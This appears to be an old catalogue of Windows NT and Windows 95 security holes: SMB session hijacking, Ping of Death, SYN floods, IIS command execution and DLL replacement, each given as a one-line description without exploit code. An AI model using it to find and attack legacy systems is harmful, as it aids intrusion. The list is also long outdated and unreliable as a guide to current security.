NT Holes and Exploits

SMB Win NT 3.5, 3.51, 4.0

session hijaking is possible

ActiveX Systems running ActiveX

controls run with users security levels and can do "bad" things.

SNA SNA Server 2.11, 3.0

users inherit first users permission on shared folders

ASP Win NT

users can download unproccessed ASP files

CIFS Win NT

is vulnerable to man-in-the-middle attack

CIFS Win NT

vulnerable to fixed key attack

cpu-hog WinNT

programs can set their own priority and effectively use all cpu cycles

delete WinNT

users can delete files with read-only permission

delete Win NT Server 3.5, 3.51, and 4.0

users can delete files they have no permissions for

DLLs Win NT 3.5, 3.51, 4.0

ANY user can replace system DLLs with trojaned ones

dns.exe Win NT 4.0

DOS attack on DNS service possible

exe control Win NT 3.5?, 3.51?, 4.0

an executable file can be run regardless of extension

FileManager Win NT 3.51

users can see files in directories he has no access perms for

find NT 4.0 (workstation), Windows '95

users can bypass policy settings

Front Page Win NT 4.0 Front Page V1.1

IUSR has full control of _vti_bin and shtml.exe possibly giving intruders access to executable directory

FTPWin NT 3.5, 3.51, 4.0
Passive connection support

passive attack

IE Windows '95, NT

can execute commands on users machine from web page

IE Win '95, Win NT, Win '97 (Memphis), IE 3.0

CIFS can run program code from remote machines on users machine

IE Windows '95, Internet Explorer v3.01

.ISP files can be executed on users machine

IE Windows 95

.bat files can be run on users machine (maybe)

IE Win NT, Internet Explorer 3.01
(possibly earlier versions)

will give users encrypted password to SMB servers without warning

IE Win NT

NTLM enctypted passwords are sent automatically

IEWin '95

obtain clear text password

IIS Systems running IIS v1.0

users can execute commands on web server

IIS Win NT Microsoft Internet Information Server 3.0

ASP pages can access any file on the web server

IIS Win NT 4.0 (server)

users can download ASP source

IIS WinNT Systems running IIS v1.0

users can execute commands on web server

IIS WinNT Systems running IIS v2

can crash the web server

IIS II WinNT 4.0

DOS attack caused by high system load

IIS NT 4.0, IIS 1.0

users can browse outside of document root or execute commands on server

IIS Win NT 3.51, 4.0

Guest access same as Domain User

IISNT 4.0

create files on server

IIS Win NT 4.0

can truncate files

IISWin NT

executes scripts without asking for user authentciation

inetinfo.exeWin NT 4.0

DOS attack

MS Access Win NT 3.5, 3.51, 4.0
Access 1.0/2.0

SIDs exposed

Netware Win 95

shared drive left open after administrator access

NetShield Win NT 3.51

users can access any machine

NTFSWin NT 3.5, 3.51, 4.0

Linux can mount NTFS and bypass security

ntfsdos.exeWin NT 3.5, 3.51, 4.0

can bypass NTFS security

passwdWin NT 3.5, 3.51, 4.0

hijack password changes and log cleartext values

SMBWin NT 3.5, 3.51, 4.0

can ask for clear text password

Password caching Win 95, WfW

users passwords are saved in a crackable format on hard drive

Ping Win NT 3.51, 4.0
Ping Of Death

Large ping packets can crash system

Registry Win NT 3.5, 3.51, 4.0

open to guest access

registrey Win NT 3.5, 3.51, 4.0

REG files automatically update system registry on open

RevertToSelf Win NT 3.5, 3.51, 4.0

Reverts the "IUSR-MACHINENAME" Account to SYSTEM account

rollback.exe NT 3.5, 3.51, 4.0

runs without warning and resets the registry

rollback.exe Win NT 3.5, 3.51, 4.0

can be executed by crashing the system

rpcss.exe Win NT 3.51, 4.0

can cause 100% cpu utilization

SambaWin WfW, 95

if unpassworded shares are enabled entire drive may be accessed

shade Win NT

does not unmount encrypted volumes on user log out

SID Win NT

can be duplicated in special cases

SMB Win NT 3.5, 3.51, 4.0

sessions can be hijacked

SMB Win NT 3.5, 3.51, 4.0

force clear text passwords

SMB Win NT 3.5, 3.51

can crash server by sending "Dir ..\"

Screen saver Win 95

Can break into screen savers

shockwaveWind 95/NT/MAC With Netscape and Shockwave
There may be other browsers/platfroms affected by similar insecurities

can read users email

SYN Win NT 3.51, 4.0

NT SYN Flood Attack

Win 32K Win NT 4.0

programs can crash system

WebSite WinNT, Win95 WebSite 1.1

CGI examples allow any command to be executed

Questions ? Comments ?
Mail:
Kill9